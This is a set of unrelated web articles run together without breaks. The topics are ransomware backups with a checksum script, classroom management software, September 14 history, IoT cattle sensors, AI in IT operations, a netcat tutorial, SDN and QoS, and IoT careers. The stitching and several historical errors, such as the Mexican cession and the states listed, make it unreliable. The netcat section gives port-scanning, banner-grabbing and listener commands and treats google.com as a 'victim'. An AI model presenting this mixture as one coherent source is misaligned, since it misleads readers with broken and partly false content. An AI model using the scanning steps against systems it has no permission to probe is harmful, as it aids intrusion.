It's critical to ensure the backup is isolated from your network to keep it safe from infection. It is also important to check the integrity of your backups regularly to ensure you are prepared in case of a ransomware hit. If you back up in this manner and you are the victim of an attack, you can format everything to rid yourself of the ransomware infection and then do a full system recovery. This way you will not have to engage with the ransomware at all, and you can restore your computer to the way it was before it was compromised. In addition to backing up your company's data, investing in reputable antivirus software and a robust, well-configured firewall is key to preventing the threat of ransomware. Keeping your security software up to date will allow for early detection of an infection. Organisations seeking to ensure a ransomware infection has minimal impact should ensure that their backup regime provides the ability to access backed-up data instantly in the event of a disaster. If your current backup service provider can't provide instant access to your data, perhaps it is time to change.

Paul Evans, Co-Founder and CEO of Redstor
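The regular integrity check recommended above can be automated. Here is a minimal, hypothetical sketch that records a checksum manifest for a backup set and later verifies that nothing is missing or has been silently altered; real backup products do this (and much more) internally.

```python
import hashlib
import json
from pathlib import Path

def sha256_of(path):
    """Checksum a file in chunks to keep memory usage flat."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def write_manifest(backup_dir, manifest_path):
    """Record a checksum for every file in the backup set."""
    manifest = {
        str(p.relative_to(backup_dir)): sha256_of(p)
        for p in Path(backup_dir).rglob("*") if p.is_file()
    }
    Path(manifest_path).write_text(json.dumps(manifest, indent=2))

def verify_backup(backup_dir, manifest_path):
    """Return the files that are missing or whose contents changed."""
    manifest = json.loads(Path(manifest_path).read_text())
    problems = []
    for rel, expected in manifest.items():
        p = Path(backup_dir) / rel
        if not p.is_file() or sha256_of(p) != expected:
            problems.append(rel)
    return problems
```

Store the manifest with the isolated backup, not on the production network, so that an attacker who encrypts your files cannot also rewrite the checksums.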
The concept of computer-based learning, also known as e-learning, is playing an increasingly important role in all industries. According to Global Market Insights, the market's total value will exceed $240 billion by 2023, as an increasing number of organizations start to rely more heavily on the internet and electronic resources to enhance the learning experience. While corporations can significantly benefit from using computer resources for training purposes, no sector is in quite as strong a position to receive a boost from computer-based learning as education. The success of e-learning at any level, however, hinges upon proper implementation. Here are a few tips and tricks to enable computer-based learning in educational and training environments.

Restrict Distracting Websites and Applications

Ever since the first computers were installed in classrooms, there have been concerns about students being distracted or accessing unsavory content on the web. With the inclusion of laptops, Chromebooks and tablets, managing an e-learning environment has only become more difficult for educators at all levels. In order to foster an engaging learning environment, it's important that educators have the ability to easily restrict the usage of certain applications and websites on classroom endpoints. The easiest way to do this is to create a whitelist of apps and websites which have been authorized for access.

Make the Most of Digital Capabilities

The purpose of computer-based learning is to improve education. But successfully leveraging e-learning resources isn't necessarily intuitive at first; much like in the enterprise, there need to be digital collaboration platforms in place to make the most of a computer environment. For an educator, these collaboration features entail the following:
- Easily communicate with one or more students at a time via instant messaging.
- Create student polls, quizzes and in-class questionnaires and quickly share them with an entire classroom.
- Instantly launch applications on multiple endpoints from a single dashboard.
- Co-browse with students to help them solve problems.
- Display a particular screen to the entire class to walk through a creative solution to a problem.

Achieve Visibility and Control

Ensuring students stay engaged and making full use of a computer's learning capabilities has great potential to improve an educator's pool of resources. But this is especially true when you don't have to worry about whether students are cheating on a pop quiz by looking up the answers online – or doing something on their device that is disruptive to learning. To that end, classroom management software can help with the following:
- Locking down and blanking out students' screens during lectures.
- Locking down applications during a computer-based exam.
- Viewing a student's screen to assess or monitor activity.
- Taking screenshots if necessary, either for learning or discipline purposes.

Computer-based learning has immense potential to improve the educational experience for students and teachers alike. It's really just a matter of leveraging that potential with the right set of classroom management tools, so that you can help students learn more effectively. To learn more about our classroom management solutions, contact Faronics today.
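The whitelist approach described earlier can be sketched in a few lines. The domains below are illustrative placeholders, and a real classroom management product would enforce the list at the endpoint or network level rather than in application code like this:

```python
from urllib.parse import urlparse

# Hypothetical whitelist maintained by the educator; any domain not
# listed (and not a subdomain of a listed one) is blocked.
ALLOWED_DOMAINS = {"wikipedia.org", "khanacademy.org", "school-portal.example"}

def is_allowed(url, allowed=ALLOWED_DOMAINS):
    """Return True if the URL's host is on (or under) the whitelist."""
    host = urlparse(url).hostname or ""
    return any(host == d or host.endswith("." + d) for d in allowed)
```

Note the subdomain check: matching on a plain substring would wrongly allow a host like `evilwikipedia.org`, so the comparison requires either an exact match or a `.`-separated suffix.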
"History is a cyclic poem written by Time upon the memories of Human Being." - Shelley, English Poet.

History is the study of the past; specifically the people, societies, events, and problems of the past, as well as our attempts to understand the past. It is a pursuit common to all human communities. History can take the form of a tremendous story, a rolling narrative filled with great personalities and tales of turmoil and triumph. Each generation adds its chapters to history while reinterpreting and finding new things in those chapters already written. Let's discover what happened on September 14 in world history:

1847: General Winfield Scott captures Mexico City

On September 14, 1847, the Stars and Stripes flew over a foreign capital for the first time in American history. After winning the last major battle of the Mexican-American War, U.S. General Winfield Scott marched his army into Mexico City and raised the American flag over the Mexican National Palace on the site of the "Halls of Montezuma." This would later be celebrated in the famous Marines' Hymn. While the last major battle was won by September of 1847 and Mexico City was captured, the Mexican-American War did not end until February 2, 1848. On that date, the United States and Mexico agreed to the Treaty of Guadalupe Hidalgo. Under the conditions of the treaty, Mexico agreed to sell California and the rest of its territory north of the Rio Grande for $15 million. The 525,000 square miles of ceded land would later become the states of New Mexico, Nevada, Utah, Arizona, Colorado, Wyoming, and Oklahoma. Mexico was also forced to recognize the U.S. annexation of Texas. Fought from 1846 to 1848, close to 79,000 American troops took part in the Mexican-American War. Future Union and Confederate generals Ulysses S. Grant, George Meade, Robert E. Lee, and Stonewall Jackson were among them. Nearly 13,200 Americans lost their lives in the conflict.
Some in the United States considered the Mexican-American War an unjust land grab. Future U.S. President Abraham Lincoln, who was an Illinois congressman at the time, was one of the war's harshest critics. While the justifications for fighting the war were debated then and are still debated today, we must always remember the bravery and skill displayed by American forces in achieving victory. As always, our troops did what was asked of them. The United States wouldn't look the way it does today without the efforts of our military in the Mexican-American War.

1959: Soviet probe reaches the moon

Just after midnight in Moscow on September 14, 1959, the Soviet Union's Luna 2 intentionally crashed into the moon, becoming the first man-made spacecraft to reach the moon. It was the Soviet Union's second attempt: Luna 1 had missed its target by about 3,700 miles after it launched in January 1959. Luna 2 carried Soviet pennants, two of which were located in the spacecraft and were sphere-shaped, with the surface covered by identical pentagonal elements. In the center of each sphere was an explosive that slowed the huge impact velocity. Each of the stainless steel pentagonal elements bore the USSR coat of arms and the date "1959 September." Reaching the moon first was a highly coveted claim during the Space Race. Unfortunately for the U.S., Luna 2 hit its target just as Soviet premier Nikita Khrushchev was due to arrive in the U.S. to be welcomed by President Eisenhower.
Austrian start-up SmaXtec has invented a tool for farmers to remotely monitor the health and wellbeing of their livestock: IoT cows. Taking advantage of the Internet of Things (IoT), the company is placing connected sensors inside cows' stomachs to transmit health data over Wi-Fi. The monitor tracks the cow's health and sends a text message to the farmer when she is pregnant. It's already being used in two dozen countries across the world, according to Bloomberg. Typically, it's hard to tell if a cow is unwell or when it might give birth. If a farmer suspects either of those things, they will usually have to herd the cow into a cattle crush for a vet to check it over. SmaXtec supposedly gets around some of these problems by placing weighted sensors – about the size of a hotdog – in through the cow's throat and into its four stomachs. The device then transmits up-to-the-minute data about the temperature of the cow, the pH of her stomach, movement, and activity. A base station in the barn picks up the signals and uploads all of the data to the cloud. If the cow falls ill, the system e-mails the vet, supposedly before the cow is obviously sick. And when a cow is pregnant, a text message is sent to the farmer and his team so that they can act accordingly. SmaXtec claims the device should have around four years of battery life and can predict with 95 percent accuracy when a cow is pregnant.

A global farming opportunity

So, is this device really better than a farmer's instinct and expertise? "It's easier, after all, to look at the situation from inside the cow than in the lab," SmaXtec's co-founder Stefan Rosenkranz told Bloomberg. And while the technology might not be able to assess exactly what is making the cow sick, Helen Hollingsworth, a veterinary nurse at Molecare Veterinary Services (SmaXtec's distributor in the UK), pointed out that things like temperature alarms "make you go and check earlier than you otherwise would.
If you can detect illness early, you can start antibiotics earlier and ultimately use less." Roughly 350 farms across two dozen countries are using this technology, SmaXtec said. The devices have been implanted into 15,000 cows in Britain alone in the last six years. Setup costs, $600 for the network plus between $75 and $400 per cow, are borne by the company or its distributors, Bloomberg reported. Farmers therefore simply pay a $10-a-month charge per cow to use the service. SmaXtec is targeting industrial operations in China, the Middle East and the U.S., but it also has an eye on the 90 million cattle on dairy farms all over the world. It will have stiff competition from the likes of Telefonica and Cattle-Watch, but it seems the age of IoT cows is well on its way. This is not the first IoT case study to involve cows, however: Fujitsu's head of insurance Nick Dumonde told IoB at the Internet of Insurance in June how farmers are increasingly using such technologies to monitor the health of pregnant cows.
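The temperature alarms described above suggest simple rule-based checks on the sensor feed. The sketch below shows the general shape of such a check; the thresholds are illustrative assumptions, not SmaXtec's actual values or veterinary guidance.

```python
# Illustrative "normal" ranges only; a real system would tune these
# per herd and per animal, and learn baselines over time.
NORMAL_TEMP_RANGE = (38.0, 39.5)   # body temperature, degrees Celsius
NORMAL_PH_RANGE = (6.0, 7.0)       # rumen pH

def check_reading(reading):
    """Return a list of alert strings for one sensor reading."""
    alerts = []
    lo, hi = NORMAL_TEMP_RANGE
    if not lo <= reading["temp_c"] <= hi:
        alerts.append(f"cow {reading['cow_id']}: temperature {reading['temp_c']} out of range")
    lo, hi = NORMAL_PH_RANGE
    if not lo <= reading["ph"] <= hi:
        alerts.append(f"cow {reading['cow_id']}: rumen pH {reading['ph']} out of range")
    return alerts
```

In a deployment like the one described, the base station would run checks of this kind on each upload and e-mail the vet or text the farmer when the returned list is non-empty.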
Preparing for AI and Automation It is undeniable that Artificial Intelligence and Automation are in the minds of the public. With major corporations such as Google, Amazon, Facebook, and Microsoft making the news on their artificial-intelligence research and products, and personalities such as Elon Musk, Bill Gates, and Stephen Hawking holding interviews warning of an A.I. apocalypse, it's no wonder people are talking about it. Artificial Intelligence has recently migrated into Information Technology, with several companies providing solutions for IT Operations. Executives and managers are quickly eyeing it up, excited by its abilities to make employees more efficient, reduce downtime, and minimize staffing. The marketing for these products is very positive, extolling the simplicity of operations and their effectiveness. The algorithms, as it is explained, will handle everything. There is a configuration cost to get it up and running and to keep it running smoothly that management may not see at first. There is no "Easy" button here. Depending on the organization, implementing an A.I. and automation platform may require thousands of hours of work. This article aims to provide some thoughts on prerequisites to using A.I. in your IT infrastructure. The first requirement is management access. These A.I. algorithms work with large amounts of data. They want to see everything, so it can be potentially correlated. Thus, we need access to everything from where the A.I. system will be installed. All devices need to be accessible via some form of management network including servers, switches, routers, firewalls, power strips, UPS's, KVM’s, and more. Effectively, anything that has the option of connecting an Ethernet cable and configuring an IP address, needs to have that done. Unless you have an existing inventory of every device that uses a power cable, this step will probably also require a full inventory of all equipment at every location. 
Many of these devices may be managed by other departments as well, requiring internal resources and collaboration. This is also an important step for many other reasons, and is highly recommended before continuing. Be sure to name these devices in a consistent manner. Most of the algorithms in use require similar wording used between devices in a logical or physical area in order to increase matching probability. This will require the formulation of a corporation-wide naming standard, and potentially renaming hundreds or thousands of devices. Regarding the network itself, depending on your environment, you may not have a management network, or you may have an unfinished one. So you'll need to design and create one for each of your locations, and get that routed properly. Or, maybe you have a very large environment with many management networks for various purposes and departments. Those will need to be identified, routes may need to be created, VPN SA’s may need reconfiguration, and ACL’s opened to the location of the A.I. system. Now that there is a management network that can communicate between all devices and your A.I. system, you need to provide management services to it. The first thing that comes to mind is SNMP. A modern network should have SNMPv3 configured if a device supports it, which requires some security design effort as well. MIB’s may have to be found, or OID’s walked. Devices will need to be configured to report all SNMP traps possible, and to allow polling from the A.I. collector. Next up would be Syslog. Preferably with encryption if supported for each device. This step would be best designed with a series of Syslog collection servers, local to each location, then forwarding those localized collections to the A.I. collector. This would require design and implementation time for such a distributed Syslog system. 
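Enforcing a consistent naming standard across hundreds or thousands of devices is much easier with a small audit script run against the inventory. The convention below (three-letter site code, device role, two-digit index) is a made-up example; substitute your own corporation-wide pattern.

```python
import re

# Hypothetical standard: <site>-<role>-<two-digit index>,
# e.g. "nyc-sw-01" or "lon-fw-03". Adjust to your own convention.
NAME_PATTERN = re.compile(r"^[a-z]{3}-(sw|rtr|fw|srv|ups)-\d{2}$")

def check_names(names):
    """Return the device names that violate the naming standard."""
    return [n for n in names if not NAME_PATTERN.match(n)]
```

Running a check like this against the full inventory before onboarding the A.I. platform flags the devices that still need renaming, rather than discovering them one by one when correlation fails.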
Part of that system would most likely include an ELK stack implementation on top of it for additional analysis, which can be very involved. There may be other monitoring systems already in-place, performing up/down detection, resource utilization alerting, and synthetic transactions. Similarly, systems such as vCenter and AWS Cloudwatch may be used. Each of these systems would need to be configured to copy all alerts to the A.I. collector. These configurations may also need to be customized for the collector, as the A.I. will want to know about events sooner and more frequently than an email alert to IT personnel. It’s very likely these reporting systems may send alerts to a ticketing system or collaboration service, which should also be integrated into the A.I. platform as an output. Once the algorithms detect a highly-probable issue, a ticket can be created for front line personnel. This may also require configuration and scaling considerations for your email server, depending on how it is integrated. So far, we’ve talked about the setup of the networked devices, to allow for detection of issues. Once these alerts are investigated, they need an action performed. If an organization wishes to enable automation, that is, the automatic resolution of alerts from these A.I. systems, there needs to be remote management access provided to all devices. Not in the form of data flow from the networked devices, but the remote access of them. Remote access methods such as SSH, and Powershell are most common today. If a device is too old or not licensed to run SSH or Powershell for example, that device will need to be replaced or upgraded. The configuration of this remote access requirement may also be lengthy. The automation methods provided usually rely on scripts of some kind. Scripts you may want to run via an automation system such as Ansible, rather than individual shell scripts. Again, we find a system that needs planning and implementation. 
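The alert-to-resolution mapping described above can be pictured as a dispatch table. In this sketch the remediation actions are placeholder functions standing in for real Ansible playbooks, and the confidence threshold is an illustrative assumption; anything unknown or low-confidence falls through to a ticket for front line personnel.

```python
# Placeholder remediation actions; in practice each would invoke an
# Ansible playbook (or similar) against the affected host.
def restart_service(alert):
    return f"restarted {alert['service']} on {alert['host']}"

def clear_disk_space(alert):
    return f"rotated logs on {alert['host']}"

REMEDIATIONS = {
    "service_down": restart_service,
    "disk_full": clear_disk_space,
}

CONFIDENCE_THRESHOLD = 0.9  # only auto-remediate high-confidence findings

def handle(alert):
    """Auto-remediate known, high-confidence issues; otherwise escalate."""
    action = REMEDIATIONS.get(alert["type"])
    if action and alert["confidence"] >= CONFIDENCE_THRESHOLD:
        return action(alert)
    return f"ticket opened for {alert['type']} on {alert['host']}"
```

Writing and validating the entries of a table like this, one per detectable issue, is exactly the up-front personnel cost the article warns about.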
This also requires personnel to write resolution scripts and playbooks for each issue that is detected, which would require personnel who know how to code, and certainly take a lot of time initially. Finally, these A.I. alerts and resolutions only happen when the algorithm has a high level of confidence that an issue is correct. That means personnel need to train the system, especially in the beginning. There are usually many algorithms that work together, each one using a different set of rules, which requires care and validation. Algorithms are diverse and may include the ability to detect relationships between alerts based on source type, physical or logical proximity, time, language usage, and topology analysis. As you can see, there is no "Easy" button here. A.I. platforms, their automation systems, and their algorithms are extremely powerful today, but they require planning, lots of preparatory work, and training once running. They cannot be implemented quickly, as a quick fix for lack of enough personnel, and in fact, will require more personnel during the implementation and configuration phase. When properly planned for and implemented, an A.I. system can be an important enhancement to IT Operations.
Many hackers and information security experts use netcat. Netcat is an old but powerful information security tool used to read from and write to network connections between computers over the TCP or UDP protocol. I have been working in the cyber security field for more than 7 years and have found that netcat still works very well. Because of its many uses and functions, it earned the name "Swiss Army knife" of ethical hacking. Major certification courses like CEH (Certified Ethical Hacker) and Penetration Testing with Kali Linux teach netcat. Netcat is available by default in Kali Linux, but if you want to use it on Windows, download the Windows build of netcat.

Here are the most common uses of netcat:
- Port scanning
- Banner grabbing
- Transferring files

Port Scanning by Netcat

Port scanning is a methodology to find open ports on a target machine. Nmap is the best-known and most powerful port scanning tool, but netcat can also be used to check whether a port on a target machine is open. Here is an example of port scanning.

Syntax:
#nc -v [Target Machine IP address] [Port Number]
#nc -v 192.168.0.1 80

The -v switch is used to get verbose output. 192.168.0.1 is the IP address of the target machine and the port number is 80. Result: port is open. If you want to scan a range of ports, provide a range instead of a single port. For example, to scan ports 10 to 100, use the following syntax:
#nc -v 192.168.0.1 10-100

Banner Grabbing by Netcat

Banner grabbing is a fingerprinting technique used to extract useful information from the target machine, such as which service is running on an open port. When we send a banner grabbing request through netcat, we receive some output; after analyzing it, we can find helpful information such as operating system details and service details for a particular port. One important thing: netcat requires an established connection to the victim machine before banner grabbing can start.
Here is an example of banner grabbing; the victim is the google.com server.

Syntax:
#nc [domain name / IP Address] [Port Number]
#nc www.google.com 80

Transferring Files by Using Netcat

The most common method for transferring files over a network is FTP, but netcat can also transfer files over the network using the TCP or UDP protocol. Two modes are required: listen mode on the sending end and connect mode on the receiving end. You must establish a connection between the two machines using a specific IP address, then execute the file transfer command.

On the sending machine (the listener):
nc -v -w 30 -l -p 31337 < file.txt

-v verbose mode; gives feedback on the screen during the operation
-w 30 tells netcat to wait 30 seconds before terminating the file transfer process
-l the computer is the listener
-p 31337 the listening port number (some netcat builds take the port without -p)
< file.txt reads the file and sends it over the connection

On the receiving machine:
#nc -v -w 3 [sender IP Address] [port number] > [File name]
#nc -v -w 3 192.168.0.1 31337 > file.txt

-w 3 wait three seconds before canceling the transfer, in case the connection is lost
192.168.0.1 IP address of the sending machine
31337 listening port on the sending machine
> file.txt writes the received data to a new file

If you have any questions about this post, please comment below.
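The same port check and banner grab that netcat performs can also be scripted, which is handy when netcat isn't installed on a machine. A minimal Python sketch using only the standard library:

```python
import socket

def port_open(host, port, timeout=3.0):
    """Attempt a TCP connect, the same check `nc -v host port` performs."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def grab_banner(host, port, timeout=3.0):
    """Connect and read whatever the service sends first (if anything)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            return s.recv(1024).decode(errors="replace")
        except socket.timeout:
            return ""
```

Note that many services (HTTP among them) say nothing until the client speaks first, so for those you would send a request line before reading, just as you would type one into an interactive netcat session.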
For the entirety of its existence, the network has functioned just like a utility company: a service available for all manner of useful functions. It has offered almost no visibility to developers and the applications they write that use the network. Now, the call is going out to make the network responsive to application needs. We have to create harmony between two things that, until now, have been almost entirely ignorant of each other. But if the network becomes more responsive to applications, applications also have to give something back to the network. QoS was one attempt to make the network more flexible based on different application requirements, such as voice. Not that the network engineers got it right the first time; it took priority queuing, weighted fair queuing, class-based weighted fair queuing and finally low-latency queuing to capture the characteristics of voice traffic. It might have been much simpler in the beginning if the voice stream could have told the network, "I need to have some guaranteed bandwidth to make sure my packets get to their destination in the right order. But I don't need all the bandwidth on the link." Now, the promise of SDN says that the network can respond to application demands. Apps can ask for things and the network can be reconfigured to provide resources as needed. That's a powerful tool for developers. It's like teaching children to ask for things instead of them shyly hoping that they'll be given something.

[There's a lot of talk about the transformation of the data center via software, but what's real and what's hype? Get some perspective in "Software Defined Data Center: Marketing or Meaty?"]

The ability to affect your operating environment is huge for developers who want to ensure availability and performance. But that ability comes with some responsibility. For example, applications need visibility into network conditions to be able to request resources.
Those same applications also need to be able to listen to network conditions and respond accordingly when those resources aren't available. Think of it like a GPS in your car that has a real-time feed for local traffic conditions. If a particular link is blocked, the network should be able to make that condition known to the application and suggest alternate links. One might be high speed but carry a higher cost; this would be critical for real-time traffic processing. The other option may be slower but less expensive; for bulk data this would be ideal. Traffic can be processed appropriately as needed based on network conditions.

You're probably saying, "That's silly. Why not just make the decision for the application? Why provide feedback at all?" That's a good point. Think about the first-generation GPS units that did automatic traffic rerouting based on conditions. You might get offered a strange surface street route to your destination instead of getting a toll road that would cost you something but get you there much faster. Would you ask your GPS why it chose that particular route? What if you have a pocket full of quarters and couldn't be late that day? Normally, you'd love the surface street option. However, conditions change and default choices need to be reexamined.

Making the choice is easy. We've built enough intelligence into the network to rapidly decide which route is best based on a number of conditions. What's important in the new network is offering the application a choice based on data that the network can provide. If we can reconfigure on the fly and tag packets to choose certain links, whether it be through a tunnel to an exit point or a hop-by-hop tag protocol, then we should offer that choice to the application developers. Why spend our time making the network do all the heavy lifting? Let the application make the decision before the first packet is sent.
The network should just respond to the chosen information provided at a higher level and send the packet to the selected destination. Again, QoS is a good example. It can only make packet decisions based on a small amount of information, like source IP or destination port. Some vendors have implemented advanced matching, such as Cisco's NBAR, but those are not universal by any means and don't track from device to device. To be really useful, QoS needs a big-picture view.

It will take some work to ensure that the applications don't take advantage of their influence. A set of policies can be enacted to discard application criteria when they are outside of a baseline or a threshold. For instance, maybe the satellite link is only for priority traffic in the event of an outage. Even if an application requests that link, a lower-order rule can prevent that traffic from transiting a given link. Triggers can also be built in along the way to send notifications to stakeholders when developers get greedy and send their traffic along expensive or priority links. This can prevent sticker shock later on when a developer unknowingly prioritizes an expensive link for non-critical traffic. Those are the kinds of safeguards that the bean counters love.

The network and the application can no longer exist in separate black boxes. At the same time, these two need to learn to get along with each other and work together to make life easier on everyone. We've spent most of our lives trying to make the network listen. Now it's time to make the applications do the same. What do you think? Should applications be responsive to the network? Or should the network stay quiet and make all the decisions absent of application input?

Are you gearing up to bring QoS to your network, or do you want a deeper understanding of how best to configure it? Check out Ethan Banks' workshop, "How To Set Up Network QoS for Voice, Video & Data" at Interop New York this October.
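The "lower-order rule" safeguard described above can be sketched in a few lines. This is a hypothetical illustration only, not any vendor's API: the link names, the `LinkPolicy` class, and the restriction rule are all invented for the example.

```python
# Hypothetical sketch of a policy guard: an application may request a link,
# but a lower-order rule can override the request and log a notification.
# Link names and the rule itself are invented for illustration.

NORMAL, OUTAGE = "normal", "outage"

class LinkPolicy:
    def __init__(self):
        # The satellite link is reserved for priority traffic during an outage.
        self.restricted = {
            "satellite": lambda prio, state: state == OUTAGE and prio == "high",
        }
        self.notifications = []  # stakeholder alerts when a request is denied

    def resolve(self, app, requested_link, priority, network_state=NORMAL):
        """Return the link the traffic will actually transit."""
        rule = self.restricted.get(requested_link)
        if rule and not rule(priority, network_state):
            # Policy overrides the application's request.
            self.notifications.append(
                f"{app} denied {requested_link} (priority={priority})"
            )
            return "default"
        return requested_link

policy = LinkPolicy()
print(policy.resolve("backup-job", "satellite", "low"))     # default
print(policy.resolve("voip", "satellite", "high", OUTAGE))  # satellite
print(policy.notifications)
```

The application still gets to ask; the network still gets the final word, and the bean counters get their audit trail in `notifications`.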
Today, a global network of connected things is used in ways no one could have imagined ten years ago. It is impossible to impress someone today talking about smart kettles or fitness collars for their dogs. Dozens of objects we use in our everyday life are now connected to the web, all in the attempt to make lives easier and grant us greater control over things. This large universe of smart and connected objects has a name: the Internet of Things. According to the most recent estimations, the number of IoT connected devices should exceed 75 billion worldwide in 2025. These connected machines and objects are now contributing to what is called the Fourth Industrial Revolution. Here is what one should know about the connected world that we live in.

What Exactly Is the Internet of Things?

The Internet of Things (IoT) is a system of interrelated computing devices, mechanical and digital machines, objects, animals or people that are provided with unique identifiers (UIDs) and the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction.

Cellular connectivity combined with the Internet has greatly sped up our developmental processes. It took only 40 years for humanity to progress from 1G to 5G. By 2030, the world is expected to use 6G Internet connectivity. Most of the newest technological developments rely on the Internet, and the Internet of Things participates in this innovation flow.

Specialists from EssayPro confirm that subjects related to IoT are getting very popular among students of different majors. Of course, most of the research papers are being prepared by IT and Engineering learners. Careers in IoT promise an interesting work environment, professional development, and high wages. It really seems to be a perfect domain for students interested in contributing to technological advancement.

Why Do We Need IoT?
Since it all comes down to data as the core element, we are now in a position where we depend on technologies that connect us. Each device can collect data for a purpose, but this data is only valuable if it is communicated, analyzed, and used on time.

Improved performance is another factor in favor of IoT. The level of interconnectedness achieved through IoT technologies helps people use things more efficiently. It allows saving scarce, non-renewable resources like time and effort. Moreover, the Internet of Things allows companies, governments, and other organizations to rethink how they deliver services and produce goods. The data collected assists them in providing more accurate and responsive interactions that bring advanced innovations and change.

What Is the Future of IoT?

The Internet of Things is only at the dawn of its development. Even those people who have already tried smart home technologies, motion sensors, and other IoT perks can see that there are lots of issues that need to be addressed. It is wrong to assume that data is all IoT is about. It is also about the security of the vast amounts of data generated through the IoT. Today, the world's biggest technological corporations see the danger in uncontrolled data collection. Therefore, the main goal of all IoT developers is to make sure that the devices they produce are secure to use. For this purpose, AI, Machine Learning, and other advanced technologies should be widely applied. In fact, lack of data security is the greatest threat the Internet of Things is facing right now. Some manufacturers were forced to recall their products when an unsecured connection had been revealed.

How Is an IoT Product Developed?

During the development process, IoT devices and objects usually pass through several stages. These stages determine the skills IoT developers should have. However, some tasks are delegated to experts in other fields.
These may include engineers, website developers, programmers, UI/UX designers, etc. IoT developers should be able to communicate with all of them to help translate connectivity and other data-related goals. The entire process usually passes through the following stages:

- Product development. IoT developers take part in this phase to ensure that wireless technologies and sensors are properly integrated into the product;
- Engineering. It is not critical for a developer to have engineering skills, but this will definitely be a plus. In many cases, the device itself is assembled by other people;
- Server programming. IoT developers should be experts in using server-side languages such as PHP, ASP.NET, or Node.js. This is needed to make sure that devices and objects are connected, and the data is securely received and stored;
- Evaluation and testing. IoT developers should carefully test prototypes to make sure all developmental goals are achieved;
- Web development. It is important for IoT developers to be able to create a website or an app supporting all the interactions with the IoT devices out in the field.

How to Pursue a Developer Career in IoT?

The requirements for IoT developers are similar to those that IT professionals face. An IoT developer should have innovative thinking and creative abilities to improve existing devices or create brand new ones. Of course, novelties should bring extra benefits for users. To build a successful career in IoT, a developer must strive for new knowledge. They should keep abreast of all changes and trends and reflect those in their work. There must be a place for testing and experiment at all times. Overall, the skill set should be as follows.

Data and Artificial Intelligence/Machine Learning

Since IoT devices and objects collect large amounts of data, people creating them should understand the techniques involved in data aggregation, management, and analysis. Otherwise, these devices will not have any practical value.
To get started in the IoT tech field successfully, ScienceSoft's IoT developers recommend that newcomers foster skills in the design, implementation, and maintenance of data management solutions, master stream and batch processing (key technologies include Azure Stream Analytics, Spark Streaming, and Apache Hadoop), and learn how to use machine learning to extract and visualize valuable analytics insights.

Deep Understanding of Sensors

Even though the device can be assembled by third parties, IoT developers are fully responsible for the functioning of sensors. Therefore, their main competence lies in the use of sensors. They need to make sure that software and hardware are integrated enough to provide the expected result.

Networking and Wireless Communication

IoT relies on communication between devices, objects, and servers. IoT developers should have solid knowledge of networking and wireless communication to ensure connectivity is robust, secure, and well adapted in terms of data rates. Any disruption in this connection can cause significant damage to the data collected. IoT developers should also be aware of IoT security to be able to protect the devices and the users. Since data is one of the most vulnerable assets, the community of specialists involved in the Internet of Things should focus on ensuring its security.

Web and Mobile Development

IoT developers should have some knowledge of web development. It is needed to ensure that a new product is connected with an application. Most end users choose smartphones, so the ability to create an iOS or Android application will definitely make you stand out from the crowd. If the solution involves human interactions, all the user interfaces should be easy and pleasant to use. IoT developers, possibly helped by UI/UX designers, should be able to design high-quality user interfaces to make sure the solution is well accepted and used as planned.
And even if you work with a professional UI/UX designer, it is useful to understand the inner side of the processes they are responsible for. Overall, it is critical to speak the same language as other professionals.

IoT Development Frameworks, Languages and Technologies

IoT is rich in frameworks, methodologies, and technologies. Of course, to build a successful career as an IoT developer, you should be an expert in the existing ones and strive to learn the emerging ones.

Nowadays, it is really an exciting time to join the field of the Internet of Things. It is still a relatively young field, but as it grows, it will need more skilled and knowledgeable professionals. For many talented people, it will be an amazing journey with lots of achievements and accomplishments in the coming years. If you are wondering about pursuing a career in IoT, it is better to start advancing your knowledge of programming, networking, web development, and security systems right now. Otherwise, you will not be able to speak the same language as those involved in the process of creating the future.
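The server programming stage described earlier — making sure device data is received, validated, and stored — can be sketched with a small ingestion function. Python is used here purely for illustration (the article names PHP, ASP.NET, and Node.js as typical choices), and the field names and in-memory "store" are invented for the example; a real deployment would use a database and authenticated, encrypted transport.

```python
import json
from datetime import datetime, timezone

# Minimal sketch of server-side telemetry ingestion. Field names and the
# in-memory STORE are hypothetical; a production system would persist to a
# database and receive payloads over TLS.

STORE = []  # stand-in for a database table

def ingest_reading(raw_payload: str) -> dict:
    """Validate a JSON telemetry payload from a device and store it."""
    data = json.loads(raw_payload)
    for field in ("device_id", "sensor", "value"):
        if field not in data:
            raise ValueError(f"missing field: {field}")
    record = {
        "device_id": str(data["device_id"]),
        "sensor": str(data["sensor"]),
        "value": float(data["value"]),
        "received_at": datetime.now(timezone.utc).isoformat(),
    }
    STORE.append(record)
    return record

rec = ingest_reading('{"device_id": "kettle-42", "sensor": "temp_c", "value": 91.5}')
print(rec["device_id"], rec["value"])
```

The same shape — parse, validate, normalize, persist — applies whatever server-side language the team actually uses.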
It's been a long day at work. Your to-do list has grown from 5 things to what feels like 500 things. You're finally home and can't think of anything better than getting into bed. You're finally in bed, except you've forgotten one thing. The bedroom light is still on, and you can only be what feels like 100 miles from the light switch. But it doesn't have to be that way. Thanks to the Internet of Things, there's an app for that. You turn the light off from your phone and resting can resume.

So, what exactly is the "Internet of Things" (IoT), I hear you ask? To put it simply, the IoT is made up of devices connected to the internet. Your everyday devices can now talk to each other through your network while being remotely monitored and controlled. Most people can identify IoT applications through these devices:

- Amazon Alexa
- Google Home
- NEST heating
- Smart TVs
- Smart lightbulbs
- Driverless cars
- Automated industrial machines

History of IoT

Technology has come far, and one could assume that IoT has only just become commonly recognised. Well, that isn't exactly true. The first device was discussed as early as 1982, one year before the original Nintendo was released in 1983. IoT was already in the making. Can you believe it? Something as simple as a modified Coke vending machine paved the way for products such as Amazon's Alexa. Found at Carnegie Mellon University, this vending machine would report back its inventory and whether the new drinks placed in it were cold or not before consumers purchased them. Nothing's worse than cracking open a warm Coke on a hot day. Thank God for IoT!

Thanks to Bill Joy, device-to-device communication started to gain traction due to his "Six Webs" framework. Cisco, though, has estimated that IoT was "born" between 2008 and 2009, because the people/things ratio increased from 0.08 to 1.84 in 2010.

Why Do These Devices Need to Collect Data?

Can you hear the voice in the back of your head?
But Amazon's Alexa spies on people – it hears everything you say. Why would we want to be spied on? Truthfully, devices found within the IoT transfer data for specific reasons, and it has been argued that this could help both the user and the wider economy.

